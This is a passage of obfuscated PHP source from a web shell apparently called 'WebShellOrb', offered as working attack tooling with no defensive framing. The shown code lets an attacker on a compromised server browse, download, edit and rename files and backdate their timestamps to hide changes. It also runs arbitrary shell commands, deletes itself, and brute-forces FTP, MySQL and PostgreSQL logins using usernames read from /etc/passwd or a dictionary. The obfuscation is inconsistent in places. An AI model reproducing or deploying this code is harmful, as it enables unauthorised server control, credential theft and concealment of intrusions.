return decbin(hexdec(${${"GLOBALS"}["vwhnmvbzmuqd"]}));
}
}
if (!function_exists("binhex")) {
function binhex($p)
{
return dechex(bindec(${${"GLOBALS"}["vwhnmvbzmuqd"]}));
}
}
if (!function_exists("hex2ascii")) {
function hex2ascii($p)
{
$uypcormetl = "r";
${"GLOBALS"}["oxhkemlp"] = "i";
${"GLOBALS"}["vfhyqqbkdp"] = "i";
${"GLOBALS"}["cfsbatzp"] = "r";
${$uypcormetl} = "";
$wfjslxaohfdq = "i";
for (${${"GLOBALS"}["vfhyqqbkdp"]} = 0; ${${"GLOBALS"}["oxhkemlp"]} < strLen(${${"GLOBALS"}["vwhnmvbzmuqd"]}); ${$wfjslxaohfdq} += 2) {
${"GLOBALS"}["jyuoooqn"] = "i";
${${"GLOBALS"}["mwpoytmwus"]} .= chr(hexdec(${${"GLOBALS"}["vwhnmvbzmuqd"]}[${${"GLOBALS"}["jyuoooqn"]}] . ${${"GLOBALS"}["vwhnmvbzmuqd"]}[${${"GLOBALS"}["clkuyojj"]} + 1]));
}
return ${${"GLOBALS"}["cfsbatzp"]};
}
}
if (!function_exists("ascii2hex")) {
function ascii2hex($p)
{
${"GLOBALS"}["urkvpg"] = "i";
${"GLOBALS"}["vbhdcqxgmn"] = "r";
${"GLOBALS"}["iwcssnxthc"] = "r";
$ottwxohxvz = "i";
$egrmdhvku = "i";
${"GLOBALS"}["pqrjnni"] = "i";
${${"GLOBALS"}["vbhdcqxgmn"]} = "";
for (${${"GLOBALS"}["urkvpg"]} = 0; ${${"GLOBALS"}["pqrjnni"]} < strlen(${${"GLOBALS"}["vwhnmvbzmuqd"]}); ++${$ottwxohxvz})
${${"GLOBALS"}["mwpoytmwus"]} .= sprintf("%02X", ord(${${"GLOBALS"}["vwhnmvbzmuqd"]}[${$egrmdhvku}]));
return strtoupper(${${"GLOBALS"}["iwcssnxthc"]});
}
}
$yiuajyicz = "k";
if (!function_exists("full_urlencode")) {
function full_urlencode($p)
{
${"GLOBALS"}["rergnurqy"] = "i";
$fgbwesun = "i";
${"GLOBALS"}["vjjybnhoogs"] = "r";
${"GLOBALS"}["kxcfhhsnt"] = "p";
${"GLOBALS"}["mtlvnnw"] = "i";
${${"GLOBALS"}["vjjybnhoogs"]} = "";
$vubqmofppqp = "p";
for (${${"GLOBALS"}["mtlvnnw"]} = 0; ${${"GLOBALS"}["rergnurqy"]} < strlen(${${"GLOBALS"}["kxcfhhsnt"]}); ++${${"GLOBALS"}["clkuyojj"]})
${${"GLOBALS"}["mwpoytmwus"]} .= "%" . dechex(ord(${$vubqmofppqp}[${$fgbwesun}]));
return strtoupper(${${"GLOBALS"}["mwpoytmwus"]});
}
}
${${"GLOBALS"}["dyvthet"]} = array(
"Base64 encode" => "base64_encode",
"Base64 decode" => "base64_decode",
"Url encode" => "urlencode",
"Url decode" => "urldecode",
"Full urlencode" => "full_urlencode",
"md5 hash" => "md5",
"sha1 hash" => "sha1",
"crypt" => "crypt",
"CRC32" => "crc32",
"ASCII to HEX" => "ascii2hex",
"HEX to ASCII" => "hex2ascii",
"HEX to DEC" => "hexdec",
"HEX to BIN" => "hex2bin",
"DEC to HEX" => "dechex",
"DEC to BIN" => "decbin",
"BIN to HEX" => "binhex",
"BIN to DEC" => "bindec",
"String to lower case" => "strtolower",
"String to upper case" => "strtoupper",
"Htmlspecialchars" => "htmlspecialchars",
"String length" => "strlen"
);
if (isset($_POST["ajax"])) {
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true);
${"GLOBALS"}["ksovovhoby"] = "temp";
ob_start();
if (in_array($_POST["p1"], ${${"GLOBALS"}["dyvthet"]}))
echo $_POST["p1"]($_POST["p2"]);
${${"GLOBALS"}["ksovovhoby"]} = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
";
echo strlen(${${"GLOBALS"}["mercgmdwe"]}), "
", ${${"GLOBALS"}["mercgmdwe"]};
exit;
}
if (empty($_POST["ajax"]) && !empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0);
WebShellOrbHeader();
echo "<h1>String conversions</h1><div class=content>";
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach (${${"GLOBALS"}["dyvthet"]} as ${$yiuajyicz} => ${${"GLOBALS"}["vvdxmjbgec"]})
echo "<option value='" . htmlspecialchars(${${"GLOBALS"}["vvdxmjbgec"]}) . "'>" . ${${"GLOBALS"}["oqvryxe"]} . "</option>";
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : "") . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? "" : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : "") . "margin-top:5px' id='strOutput'>";
if (!empty($_POST["p1"])) {
${"GLOBALS"}["iotqrbrxndx"] = "stringTools";
if (in_array($_POST["p1"], ${${"GLOBALS"}["iotqrbrxndx"]}))
echo htmlspecialchars($_POST["p1"]($_POST["p2"]));
}
echo "</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>
<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='>>'></td></tr>
</table></form>";
function WebShellOrbRecursiveGlob($path)
{
$nwlnoptyz = "path";
${"GLOBALS"}["hgogjrkzpqhg"] = "path";
$tucxriw = "path";
$wdohupkfrto = "paths";
$ethxrtpluwhs = "paths";
if (substr(${${"GLOBALS"}["ffswlhab"]}, -1) != "/")
${$tucxriw} .= "/";
${$wdohupkfrto} = @array_unique(@array_merge(@glob(${${"GLOBALS"}["hgogjrkzpqhg"]} . $_POST["p3"]), @glob(${$nwlnoptyz} . "*", GLOB_ONLYDIR)));
if (is_array(${${"GLOBALS"}["gigsmqyowb"]}) && @count(${$ethxrtpluwhs})) {
${"GLOBALS"}["upicreqkad"] = "paths";
foreach (${${"GLOBALS"}["upicreqkad"]} as ${${"GLOBALS"}["bdmqwqvfqn"]}) {
$qbvtxmhfia = "item";
if (@is_dir(${$qbvtxmhfia})) {
${"GLOBALS"}["cewiitv"] = "item";
if (${${"GLOBALS"}["ffswlhab"]} != ${${"GLOBALS"}["cewiitv"]})
WebShellOrbRecursiveGlob(${${"GLOBALS"}["bdmqwqvfqn"]});
} else {
${"GLOBALS"}["lxdqqw"] = "item";
if (empty($_POST["p2"]) || @strpos(file_get_contents(${${"GLOBALS"}["lxdqqw"]}), $_POST["p2"]) !== false)
echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode(${${"GLOBALS"}["bdmqwqvfqn"]}) . "\", "view","")'>" . htmlspecialchars(${${"GLOBALS"}["bdmqwqvfqn"]}) . "</a><br>";
}
}
}
}
if (@$_POST["p3"])
WebShellOrbRecursiveGlob($_POST["c"]);
echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
<input type='hidden' name='act' value='find'/>
<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
<input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
<input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
</form></div>";
WebShellOrbFooter();
}
function actionFilesTools()
{
${"GLOBALS"}["cyeedimdkbm"] = "uid";
$sfgrxg = "v";
${"GLOBALS"}["wfalbmw"] = "m";
if (isset($_POST["p1"]))
$_POST["p1"] = urldecode($_POST["p1"]);
${"GLOBALS"}["yhocee"] = "i";
$ixhzma = "len";
${"GLOBALS"}["mslshihi"] = "v";
if (@$_POST["p2"] == "download") {
if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=" . basename($_POST["p1"]));
if (function_exists("mime_content_type")) {
${${"GLOBALS"}["vxhdoihqlkd"]} = @mime_content_type($_POST["p1"]);
header("Content-Type: " . ${${"GLOBALS"}["vxhdoihqlkd"]});
} else
header("Content-Type: application/octet-stream");
${${"GLOBALS"}["tbrhqbi"]} = @fopen($_POST["p1"], "r");
if (${${"GLOBALS"}["tbrhqbi"]}) {
${"GLOBALS"}["fiqenihpmo"] = "fp";
${"GLOBALS"}["fkmsxvf"] = "fp";
while (!@feof(${${"GLOBALS"}["fiqenihpmo"]}))
echo @fread(${${"GLOBALS"}["tbrhqbi"]}, 1024);
fclose(${${"GLOBALS"}["fkmsxvf"]});
}
}
exit;
}
${"GLOBALS"}["fcmlcpm"] = "v";
if (@$_POST["p2"] == "mkfile") {
if (!file_exists($_POST["p1"])) {
$yacaqadof = "fp";
${${"GLOBALS"}["tbrhqbi"]} = @fopen($_POST["p1"], "w");
if (${$yacaqadof}) {
${"GLOBALS"}["ndtxauj"] = "fp";
$_POST["p2"] = "edit";
fclose(${${"GLOBALS"}["ndtxauj"]});
}
}
}
WebShellOrbHeader();
${"GLOBALS"}["gnlcurqo"] = "gid";
echo "<h1>File tools</h1><div class=content>";
if (!file_exists(@$_POST["p1"])) {
echo "File not exists";
WebShellOrbFooter();
return;
}
${${"GLOBALS"}["cyeedimdkbm"]} = @posix_getpwuid(@fileowner($_POST["p1"]));
${"GLOBALS"}["zoezishs"] = "c";
$vuqevyb = "i";
$xieybe = "h";
if (!${${"GLOBALS"}["gkjyrzxng"]}) {
$krhueyipvqu = "gid";
${${"GLOBALS"}["gkjyrzxng"]}["name"] = @fileowner($_POST["p1"]);
${$krhueyipvqu}["name"] = @filegroup($_POST["p1"]);
} else
${${"GLOBALS"}["elkyxmiyu"]} = @posix_getgrgid(@filegroup($_POST["p1"]));
${"GLOBALS"}["xagkiumizbm"] = "n";
${"GLOBALS"}["dlhdsyobutdy"] = "fp";
echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? WebShellOrbViewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . WebShellOrbPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . ${${"GLOBALS"}["gkjyrzxng"]}["name"] . "/" . ${${"GLOBALS"}["gnlcurqo"]}["name"] . "<br>";
echo "<span>Change time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>";
$jkomyhk = "c";
if (empty($_POST["p2"]))
$_POST["p2"] = "view";
if (is_file($_POST["p1"]))
${${"GLOBALS"}["wfalbmw"]} = array(
"View",
"Highlight",
"Download",
"Hexdump",
"Edit",
"Chmod",
"Rename",
"Touch"
);
else
${${"GLOBALS"}["fskqowyovpk"]} = array(
"Chmod",
"Rename",
"Touch"
);
foreach (${${"GLOBALS"}["fskqowyovpk"]} as ${${"GLOBALS"}["vvdxmjbgec"]})
echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower(${${"GLOBALS"}["fcmlcpm"]}) . "')">" . ((strtolower(${$sfgrxg}) == @$_POST["p2"]) ? "<b>[ " . ${${"GLOBALS"}["mslshihi"]} . " ]</b>" : ${${"GLOBALS"}["vvdxmjbgec"]}) . "</a> ";
${"GLOBALS"}["ckssowbw"] = "fp";
echo "<br><br>";
switch ($_POST["p2"]) {
case "view":
echo "<pre class=ml1>";
${${"GLOBALS"}["tbrhqbi"]} = @fopen($_POST["p1"], "r");
if (${${"GLOBALS"}["dlhdsyobutdy"]}) {
${"GLOBALS"}["gfdlnkicwrc"] = "fp";
$pzihhtxvna = "fp";
while (!@feof(${${"GLOBALS"}["gfdlnkicwrc"]}))
echo htmlspecialchars(@fread(${$pzihhtxvna}, 1024));
@fclose(${${"GLOBALS"}["tbrhqbi"]});
}
echo "</pre>";
break;
case "highlight":
if (@is_readable($_POST["p1"])) {
echo "<div class=ml1 style=\"background-color: #e1e1e1;color:black;">";
${"GLOBALS"}["wwzweuj"] = "code";
${"GLOBALS"}["djpffjy"] = "code";
${${"GLOBALS"}["wwzweuj"]} = @highlight_file($_POST["p1"], true);
echo str_replace(array(
"<span ",
"</span>"
), array(
"<font ",
"</font>"
), ${${"GLOBALS"}["djpffjy"]}) . "</div>";
}
break;
case "chmod":
if (!empty($_POST["p3"])) {
$nerjtgakmkl = "perms";
${"GLOBALS"}["lwnljwozvvfm"] = "i";
$tmvoqwqnvp = "perms";
$djwprjghcfev = "i";
${$nerjtgakmkl} = 0;
for (${${"GLOBALS"}["clkuyojj"]} = strlen($_POST["p3"]) - 1; ${${"GLOBALS"}["lwnljwozvvfm"]} >= 0; --${${"GLOBALS"}["clkuyojj"]})
${$tmvoqwqnvp} += (int) $_POST["p3"][${${"GLOBALS"}["clkuyojj"]}] * pow(8, (strlen($_POST["p3"]) - ${$djwprjghcfev} - 1));
if (!@chmod($_POST["p1"], ${${"GLOBALS"}["bgbndglw"]}))
echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>";
}
clearstatcache();
echo "<script>p3_=\"";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value=\"" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . "\"><input type=submit value=\">>\"></form>";
break;
case "edit":
if (!is_writable($_POST["p1"])) {
echo "File isn't writeable";
break;
}
if (!empty($_POST["p3"])) {
${"GLOBALS"}["tkmoymxtco"] = "fp";
$oixcyn = "time";
${$oixcyn} = @filemtime($_POST["p1"]);
$_POST["p3"] = substr($_POST["p3"], 1);
${${"GLOBALS"}["tkmoymxtco"]} = @fopen($_POST["p1"], "w");
if (${${"GLOBALS"}["tbrhqbi"]}) {
@fwrite(${${"GLOBALS"}["tbrhqbi"]}, $_POST["p3"]);
$klfedf = "time";
@fclose(${${"GLOBALS"}["tbrhqbi"]});
echo "Saved!<br><script>p3_=\"\";</script>";
@touch($_POST["p1"], ${$klfedf}, ${${"GLOBALS"}["rifohoju"]});
}
}
echo "<form onsubmit=\"g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;\"><textarea name=text class=bigarea>";
${${"GLOBALS"}["ckssowbw"]} = @fopen($_POST["p1"], "r");
if (${${"GLOBALS"}["tbrhqbi"]}) {
$nfmitia = "fp";
while (!@feof(${${"GLOBALS"}["tbrhqbi"]}))
echo htmlspecialchars(@fread(${${"GLOBALS"}["tbrhqbi"]}, 1024));
@fclose(${$nfmitia});
}
echo "</textarea><input type=submit value=\">>\"></form>";
break;
case "hexdump":
${${"GLOBALS"}["zoezishs"]} = @file_get_contents($_POST["p1"]);
${${"GLOBALS"}["xagkiumizbm"]} = 0;
${${"GLOBALS"}["aihxtguj"]} = array(
"00000000<br>",
"",
""
);
${${"GLOBALS"}["srhpuno"]} = strlen(${$jkomyhk});
for (${${"GLOBALS"}["yhocee"]} = 0; ${$vuqevyb} < ${$ixhzma}; ++${${"GLOBALS"}["clkuyojj"]}) {
$thmyniq = "h";
${"GLOBALS"}["rxjppyj"] = "c";
$zwhvop = "i";
$nhqwejrynrqs = "h";
$nvtehletxkg = "c";
$ifdzzuwde = "h";
${$ifdzzuwde}[1] .= sprintf("%02X", ord(${$nvtehletxkg}[${$zwhvop}])) . " ";
${"GLOBALS"}["oxuermmp"] = "h";
$hyxbwfpurqe = "h";
switch (ord(${${"GLOBALS"}["sbuwwkozt"]}[${${"GLOBALS"}["clkuyojj"]}])) {
case 0:
${${"GLOBALS"}["oxuermmp"]}[2] .= " ";
break;
case 9:
${$thmyniq}[2] .= " ";
break;
case 10:
${$nhqwejrynrqs}[2] .= " ";
break;
case 13:
${${"GLOBALS"}["aihxtguj"]}[2] .= " ";
break;
default:
${$hyxbwfpurqe}[2] .= ${${"GLOBALS"}["rxjppyj"]}[${${"GLOBALS"}["clkuyojj"]}];
break;
}
${${"GLOBALS"}["onmdrx"]}++;
if (${${"GLOBALS"}["onmdrx"]} == 32) {
${${"GLOBALS"}["onmdrx"]} = 0;
$evxodxyjwete = "h";
$fvknjtlk = "len";
if (${${"GLOBALS"}["clkuyojj"]} + 1 < ${$fvknjtlk}) {
${"GLOBALS"}["pnpkwrztoyz"] = "h";
${${"GLOBALS"}["pnpkwrztoyz"]}[0] .= sprintf("%08X", ${${"GLOBALS"}["clkuyojj"]} + 1) . "<br>";
}
${$evxodxyjwete}[1] .= "<br>";
${${"GLOBALS"}["aihxtguj"]}[2] .= "
";
}
}
echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\"><pre>" . ${${"GLOBALS"}["aihxtguj"]}[0] . "</pre></span></td><td bgcolor=#282828><pre>" . ${$xieybe}[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars(${${"GLOBALS"}["aihxtguj"]}[2]) . "</pre></td></tr></table>";
break;
case "rename":
if (!empty($_POST["p3"])) {
if (!@rename($_POST["p1"], $_POST["p3"]))
echo "Can't rename!<br>";
else
die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"\")</script>");
}
echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value=\"" . htmlspecialchars($_POST["p1"]) . "\"><input type=submit value=\">>"></form>";
break;
case "touch":
if (!empty($_POST["p3"])) {
${"GLOBALS"}["lkzxojbx"] = "time";
${${"GLOBALS"}["lkzxojbx"]} = strtotime($_POST["p3"]);
if (${${"GLOBALS"}["rifohoju"]}) {
$mhwnuhbbl = "time";
if (!touch($_POST["p1"], ${$mhwnuhbbl}, ${${"GLOBALS"}["rifohoju"]}))
echo "Fail!";
else
echo "Touched!";
} else
echo "Bad time format!";
}
clearstatcache();
echo "<script>p3_=\"\";</script><form onsubmit=\"g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;\"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value=">>\"></form>";
break;
}
echo "</div>";
WebShellOrbFooter();
}
function actionConsole()
{
if (!empty($_POST["p1"]) && !empty($_POST["p2"])) {
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true);
$_POST["p1"] .= " 2>&1";
} elseif (!empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0);
if (isset($_POST["ajax"])) {
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true);
ob_start();
echo "d.cf.cmd.value='';
";
${${"GLOBALS"}["mercgmdwe"]} = @iconv($_POST["charset"], "UTF-8", addcslashes("
\$ " . $_POST["p1"] . "
" . WebShellOrbEx($_POST["p1"]), "
\'"));
if (preg_match("!.*cd\s+([^;]+)\$!", $_POST["p1"], ${${"GLOBALS"}["khtkbtbcp"]})) {
${"GLOBALS"}["mcbiqyqu"] = "match";
if (@chdir(${${"GLOBALS"}["mcbiqyqu"]}[1])) {
$GLOBALS["cwd"] = @getcwd();
echo "c_='" . $GLOBALS["cwd"] . "';";
}
}
echo "d.cf.output.value+='" . ${${"GLOBALS"}["mercgmdwe"]} . "';";
${"GLOBALS"}["ecgpnycjo"] = "temp";
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
$dkkkes = "temp";
${${"GLOBALS"}["mercgmdwe"]} = ob_get_clean();
echo strlen(${${"GLOBALS"}["ecgpnycjo"]}), "
", ${$dkkkes};
exit;
}
if (empty($_POST["ajax"]) && !empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0);
WebShellOrbHeader();
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length-1;
}
</script>";
echo "<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>";
${"GLOBALS"}["lppivzlrtq"] = "v";
foreach ($GLOBALS["aliases"] as ${${"GLOBALS"}["onmdrx"]} => ${${"GLOBALS"}["lppivzlrtq"]}) {
if (${${"GLOBALS"}["vvdxmjbgec"]} == "") {
$mtvypobd = "n";
echo "<optgroup label=\"-" . htmlspecialchars(${$mtvypobd}) . "-\"></optgroup>";
continue;
}
echo "<option value=\"" . htmlspecialchars(${${"GLOBALS"}["vvdxmjbgec"]}) . "\">" . ${${"GLOBALS"}["onmdrx"]} . "</option>";
}
echo "</select><input type=button onclick=\"add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : "") . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : "") . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style=\"border-bottom:0;margin:0;" readonly>";
if (!empty($_POST["p1"])) {
echo htmlspecialchars("\$ " . $_POST["p1"] . "
" . WebShellOrbEx($_POST["p1"]));
}
echo "</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%"><tr><td width="1%\">\$</td><td><input type=text name=cmd style="border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>";
echo "</form></div><script>d.cf.cmd.focus();</script>";
WebShellOrbFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER["HTTP_HOST"]), "", time() - 3600);
die("bye!");
}
function actionSelfRemove()
{
if ($_POST["p1"] == "yes") {
if (@unlink(preg_replace("!\(\d+\)\s.*!", "", __FILE__)))
die("Shell removed");
else
echo "unlink error!";
}
if ($_POST["p1"] != "yes")
WebShellOrbHeader();
echo "<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick=\"g(null,null,'yes')">Yes</a></div>";
WebShellOrbFooter();
}
function actionBruteforce()
{
WebShellOrbHeader();
if (isset($_POST["proto"])) {
echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>";
if ($_POST["proto"] == "ftp") {
function WebShellOrbBruteForce($ip, $port, $login, $pass)
{
${"GLOBALS"}["orrdncz"] = "login";
$uznclobfyc = "pass";
${"GLOBALS"}["hvjfbdpewh"] = "fp";
$dhzvzdjxb = "port";
${${"GLOBALS"}["tbrhqbi"]} = @ftp_connect(${${"GLOBALS"}["qelasgmoq"]}, ${$dhzvzdjxb} ? ${${"GLOBALS"}["nhegyujkbg"]} : 21);
if (!${${"GLOBALS"}["hvjfbdpewh"]})
return false;
$dhmeygjtci = "fp";
${${"GLOBALS"}["ymhnnp"]} = @ftp_login(${${"GLOBALS"}["tbrhqbi"]}, ${${"GLOBALS"}["orrdncz"]}, ${$uznclobfyc});
@ftp_close(${$dhmeygjtci});
return ${${"GLOBALS"}["ymhnnp"]};
}
} elseif ($_POST["proto"] == "mysql") {
function WebShellOrbBruteForce($ip, $port, $login, $pass)
{
$xzunqnw = "res";
${"GLOBALS"}["wrqqkvfiw"] = "port";
${"GLOBALS"}["nzxrekzw"] = "res";
${"GLOBALS"}["jhqqekpgddc"] = "login";
${"GLOBALS"}["estwoghymkq"] = "res";
${${"GLOBALS"}["nzxrekzw"]} = @mysql_connect(${${"GLOBALS"}["qelasgmoq"]} . ":" . (${${"GLOBALS"}["nhegyujkbg"]} ? ${${"GLOBALS"}["wrqqkvfiw"]} : 3306), ${${"GLOBALS"}["jhqqekpgddc"]}, ${${"GLOBALS"}["icduirvc"]});
@mysql_close(${$xzunqnw});
return ${${"GLOBALS"}["estwoghymkq"]};
}
} elseif ($_POST["proto"] == "pgsql") {
function WebShellOrbBruteForce($ip, $port, $login, $pass)
{
${"GLOBALS"}["qgtevigiolv"] = "pass";
$kgcwsyxmq = "str";
$tjassyjer = "port";
$lgcepsiowx = "str";
${$kgcwsyxmq} = "host='" . ${${"GLOBALS"}["qelasgmoq"]} . "' port='" . ${$tjassyjer} . "' user='" . ${${"GLOBALS"}["bdrlwjttk"]} . "' password='" . ${${"GLOBALS"}["qgtevigiolv"]} . "' dbname=postgres";
${${"GLOBALS"}["ymhnnp"]} = @pg_connect(${$lgcepsiowx});
${"GLOBALS"}["xtwmvqil"] = "res";
@pg_close(${${"GLOBALS"}["ymhnnp"]});
return ${${"GLOBALS"}["xtwmvqil"]};
}
}
${"GLOBALS"}["mtnbnvahk"] = "attempts";
$sdtrshb = "server";
${${"GLOBALS"}["nscqaqn"]} = 0;
${${"GLOBALS"}["mtnbnvahk"]} = 0;
${$sdtrshb} = explode(":", $_POST["server"]);
if ($_POST["type"] == 1) {
${${"GLOBALS"}["mercgmdwe"]} = @file("/etc/passwd");
if (is_array(${${"GLOBALS"}["mercgmdwe"]})) {
${"GLOBALS"}["snenajn"] = "line";
foreach (${${"GLOBALS"}["mercgmdwe"]} as ${${"GLOBALS"}["snenajn"]}) {
${"GLOBALS"}["bgxqffvest"] = "server";
${"GLOBALS"}["vrwvhlemm"] = "line";
$lkfguubws = "line";
${"GLOBALS"}["ceixzegqt"] = "line";
${${"GLOBALS"}["ceixzegqt"]} = explode(":", ${$lkfguubws});
$odemeqxd = "line";
++${${"GLOBALS"}["civkgkkc"]};
if (WebShellOrbBruteForce(@${${"GLOBALS"}["nnwtcnvv"]}[0], @${${"GLOBALS"}["bgxqffvest"]}[1], ${${"GLOBALS"}["vrwvhlemm"]}[0], ${$odemeqxd}[0])) {
${${"GLOBALS"}["nscqaqn"]}++;
echo "<b>" . htmlspecialchars(${${"GLOBALS"}["omanxfropl"]}[0]) . "</b>:" . htmlspecialchars(${${"GLOBALS"}["omanxfropl"]}[0]) . "<br>";
}
if (@$_POST["reverse"]) {
$cfxddtbkve = "attempts";
$gfxuhsrtkeve = "line";
${"GLOBALS"}["tdkpthocifar"] = "tmp";
$vrbvgxqwmgy = "i";
${${"GLOBALS"}["ecbcmiybue"]} = "";
${"GLOBALS"}["iqktzfnl"] = "i";
$cludwpcuhof = "i";
$qsuknriguig = "tmp";
for (${$cludwpcuhof} = strlen(${${"GLOBALS"}["omanxfropl"]}[0]) - 1; ${${"GLOBALS"}["iqktzfnl"]} >= 0; --${${"GLOBALS"}["clkuyojj"]})
${${"GLOBALS"}["tdkpthocifar"]} .= ${$gfxuhsrtkeve}[0][${$vrbvgxqwmgy}];
++${$cfxddtbkve};
if (WebShellOrbBruteForce(@${${"GLOBALS"}["nnwtcnvv"]}[0], @${${"GLOBALS"}["nnwtcnvv"]}[1], ${${"GLOBALS"}["omanxfropl"]}[0], ${$qsuknriguig})) {
${"GLOBALS"}["uhirxfxp"] = "success";
$fhhrngya = "tmp";
${${"GLOBALS"}["uhirxfxp"]}++;
echo "<b>" . htmlspecialchars(${${"GLOBALS"}["omanxfropl"]}[0]) . "</b>:" . htmlspecialchars(${$fhhrngya});
}
}
}
}
} elseif ($_POST["type"] == 2) {
${"GLOBALS"}["seukopj"] = "temp";
${${"GLOBALS"}["seukopj"]} = @file($_POST["dict"]);
if (is_array(${${"GLOBALS"}["mercgmdwe"]})) {
$cpxpxkucuiy = "temp";
foreach (${$cpxpxkucuiy} as ${${"GLOBALS"}["omanxfropl"]}) {
$jidncks = "server";
${"GLOBALS"}["tmyvgbh"] = "attempts";
${"GLOBALS"}["llsukg"] = "server";
${"GLOBALS"}["icdufnwd"] = "line";
${${"GLOBALS"}["icdufnwd"]} = trim(${${"GLOBALS"}["omanxfropl"]});
++${${"GLOBALS"}["tmyvgbh"]};
if (WebShellOrbBruteForce(${${"GLOBALS"}["llsukg"]}[0], @${$jidncks}[1], $_POST["login"], ${${"GLOBALS"}["omanxfropl"]})) {
${"GLOBALS"}["joqkwowlnat"] = "success";
$kubptgfdsmd = "line";
${${"GLOBALS"}["joqkwowlnat"]}++;
echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars(${$kubptgfdsmd}) . "<br>";
}
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
